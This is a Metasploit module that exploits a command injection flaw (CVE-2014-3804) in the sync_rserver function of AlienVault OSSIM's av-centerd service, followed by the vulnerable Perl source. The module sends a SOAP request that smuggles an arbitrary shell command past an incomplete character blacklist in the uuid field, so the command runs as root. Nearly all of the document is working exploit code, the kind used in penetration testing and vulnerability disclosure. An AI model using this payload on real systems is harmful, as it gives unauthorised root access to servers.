require 'msf/core'
 
class MetasploitModule < Msf::Auxiliary
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize
        super(
            'Name'        => 'Alienvault OSSIM av-centerd Util.pm sync_rserver Command Execution',
            'Description' => %q{
                This module exploits a command injection vulnerability found within the sync_rserver
                function in Util.pm. The vulnerability is triggered due to an incomplete blacklist
                during the parsing of the $uuid parameter. This allows for the escaping of a system
                command allowing for arbitrary command execution as root
            },
            'References'  =>
            [
                [ 'CVE', '2014-3804' ],
                [ 'ZDI', '14-197' ],
                [ 'URL', 'http://forums.alienvault.com/discussion/2690' ],
            ],
            'Author'      => [ 'james fitts' ],
            'License'     => MSF_LICENSE,
            'DisclosureDate' => 'Jun 11 2014')
 
        register_options([
            Opt::RPORT(40007),
            OptBool.new('SSL',   [true, 'Use SSL', true]),
            OptString.new('CMD', [ false, 'This is the file to download', 'touch /tmp/file.txt'])
        ], self.class)
     
    end
 
    def run
 
        soap =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n"
        soap += "<soap:Envelope xmlns:soap=\"http:\/\/schemas.xmlsoap.org/soap/envelope/\"\r\n"
        soap += "xmlns:soapenc=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding/\" xmlns:xsd=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\r\n"
        soap += "xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\r\n"
        soap += "soap:encodingStyle=\"http:\/\/schemas.xmlsoap.org\/soap\/encoding\/\">\r\n"
        soap += "<soap:Body>\r\n"
        soap += "<sync_rserver xmlns=\"AV\/CC\/Util\">\r\n"
        soap += "<c-gensym3 xsi:type=\"xsd:string\">All</c-gensym3>\r\n"
        soap += "<c-gensym5 xsi:type=\"xsd:string\">& #{datastore['CMD']} </c-gensym5>\r\n"
        soap += "<c-gensym7 xsi:type=\"xsd:string\">#{datastore['RHOST']}</c-gensym7>\r\n"
        soap += "<c-gensym9 xsi:type=\"xsd:string\">#{Rex::Text.rand_text_alpha(4 + rand(4))}</c-gensym9>\r\n"
        soap += "</sync_rserver>\r\n"
        soap += "</soap:Body>\r\n"
        soap += "</soap:Envelope>\r\n"
 
        res = send_request_cgi(
            {
                'uri'   =>   '/av-centerd',
                'method'    =>   'POST',
                'ctype'     =>   'text/xml; charset=UTF-8',
                'data'      =>   soap,
                'headers'   =>   {
                    'SOAPAction'    =>   "\"AV/CC/Util#sync_rserver\""
                }
            }, 20)
 
        if res && res.code == 200
            print_good("Command executed successfully!")
        else
            print_bad("Something went wrong...")
        end
 
    end
 
end
__END__
 
/usr/share/alienvault-center/lib/AV/CC/Util.pm
 
sub sync_rserver
{
    my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname ) = @_;
    verbose_log_file(
        "SYNC RSERVER TASK : Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre)"
    );
 
    if ($uuid =~  /[;`\$\<\>\|]/) {
        console_log_file("Not allowed uuid: $uuid in sync_rserver\n");
        my @ret = ("Error");
        return \@ret;
    }
 
    my $conn = Avtools::get_database();
    my $sqlfile = "/tmp/sync_${uuid}.sql";
    my $sqlfile_old = "/tmp/sync_${uuid}.sql.old";
    my $sqlfile_md5 = `md5sum $sqlfile | awk '{print \$1}'`;
    my $sqlfile_content;
    my $status = 1;
    my $counter = 0;
    my @ret;
    my $query = qq{};
    my $dbq;
 
    if ( -f $sqlfile_old )
    {
        my $sqlfile_old_md5 = `md5sum $sqlfile_old | awk '{print \$1}'`;
        debug_log_file ("Old MD5: $sqlfile_old_md5 New MD5: $sqlfile_md5");
        if ( $sqlfile_md5 eq $sqlfile_old_md5 )
        {
            unlink $sqlfile;
            verbose_log_file ("Already sync'ed!");
            return "0";
        }
        else
        {
            unlink $sqlfile_old;
        }
    }
 
    my $query_array = `ossim-db < $sqlfile 2>&1`;
    $query_array =~ s/[\s\n]+$//g;
    if ($query_array ne '')
    {
        $status = $query_array;
    }
    else
    {
        $status = 0;
    }
 
    if ( ! (defined $status) or $status == 0 )
    {
        if ( grep /RESTART\sOSSIM\-SERVER/, $sqlfile )
        {
            verbose_log_file("RESTART OSSIM-SERVER MARK found. Restarting ossim-server");
            system('/etc/init.d/ossim-server restart');
        }
        else
        {
            debug_log_file("RESTART OSSIM-SERVER MARK not found. Skipping ossim-server restart");
        }
 
        $query = qq{REPLACE INTO alienvault.config (conf, value) VALUES ('latest_asset_change', utc_timestamp())};
        debug_log_file($query);
        $dbq = $conn->prepare($query);
        $dbq->execute();
        $dbq->finish();
    }
    else
    {
        verbose_log_file ("Error syncing rservers: ${status}");
    }
 
    debug_log_file("Move file: $sqlfile");
    move ($sqlfile, $sqlfile . ".old");
 
#    push @ret, "0";
    return "0";
}